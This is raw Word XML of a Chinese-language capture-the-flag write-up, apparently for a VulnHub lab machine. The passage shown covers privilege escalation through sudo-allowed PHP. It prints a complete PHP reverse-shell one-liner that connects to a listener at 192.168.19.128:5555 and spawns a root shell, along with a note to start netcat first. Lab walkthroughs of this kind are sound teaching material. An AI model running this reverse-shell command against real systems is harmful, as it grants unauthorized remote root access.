          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中里面包含第一个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C7453" w14:textId="70665E14" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CEA488" wp14:editId="3A144D06">
            <wp:extent cx="5274310" cy="18211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95E" w14:textId="0EF23D0F" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="7E1D3399" w14:textId="7324DBE9" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x05:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815658A" w14:textId="5B54FBFB" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被我们赋予</w:t>
      </w:r>
      <w:r w:rsidR="00FF3CB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重望的s</w:t>
      </w:r>
      <w:r w:rsidR="00FF3CB4">
        <w:t>udo-l</w:t>
      </w:r>
      <w:r w:rsidR="00FF3CB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没倒下，只不过这次是/</w:t>
      </w:r>
      <w:r w:rsidR="00FF3CB4">
        <w:t>usr/bin/php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E287EF8" w14:textId="53B206E5" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483F971E" wp14:editId="572FB544">
            <wp:extent cx="3137061" cy="742988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65FE" w14:textId="26562B1C" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="52C0883E" w14:textId="7F4D8312" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里查了以下p</w:t>
      </w:r>
      <w:r>
        <w:t>hp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可以和p</w:t>
      </w:r>
      <w:r>
        <w:t>ython netcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样有一句话反弹的顺便参考了</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00984CCE">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/zhuxr/p/9854230.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA3C07" w14:textId="06EE577D" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E29C734" wp14:editId="0207F929">
            <wp:extent cx="5274310" cy="28054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5BB" w14:textId="52232E7C" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="2ABB3107" w14:textId="3288ACFE" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成s</w:t>
      </w:r>
      <w:r>
        <w:t>udo /usr/bin/</w:t>
      </w:r>
      <w:r>
        <w:t>php -r '$sock=fsockopen("192.168.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.128</w:t>
      </w:r>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5555</w:t>
      </w:r>
      <w:r>
        <w:t>);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40614B4A" w14:textId="6F922681" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="54DC0DC9" w14:textId="2C92000E" w:rsidR="00FF3CB4" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得提前开启n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，反弹以后就是r</w:t>
      </w:r>
      <w:r>
        <w:t>oot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限了顺便可以读到f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED691D7" w14:textId="39DD389D" w:rsidR="00FF3CB4" w:rsidRPr="000A4CE1" w:rsidRDefault="00FF3CB4" w:rsidP="000A4CE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6D1A65D" wp14:editId="1804FB53">
            <wp:extent cx="5274310" cy="18053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CB4" w:rsidRPr="000A4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18971" w14:textId="77777777" w:rsidR="003B7D8E" w:rsidRDefault="003B7D8E" w:rsidP="00FC48A9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E625CFC" w14:textId="77777777" w:rsidR="003B7D8E" w:rsidRDefault="003B7D8E" w:rsidP="00FC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97311" w14:textId="77777777" w:rsidR="003B7D8E" w:rsidRDefault="003B7D8E" w:rsidP="00FC48A9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F7A2DF5" w14:textId="77777777" w:rsidR="003B7D8E" w:rsidRDefault="003B7D8E" w:rsidP="00FC4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79"/>
    <w:rsid w:val="000A4CE1"/>
    <w:rsid w:val="002666BC"/>
    <w:rsid w:val="003308AD"/>
    <w:rsid w:val="003B7D8E"/>
    <w:rsid w:val="0096713A"/>
    <w:rsid w:val="00AD0205"/>
    <w:rsid w:val="00B36279"/>
    <w:rsid w:val="00CB1777"/>
    <w:rsid w:val="00FC48A9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BD3B4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9F32188B-4FC5-40FA-8469-B93402ED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8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48A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C48A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192.168.19.144/index.php?page=profile&amp;user_id=12" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/zhuxr/p/9854230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ulnhub.com/entry/me-and-my-girlfriend-1,409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2020-10-20T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-20T13:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>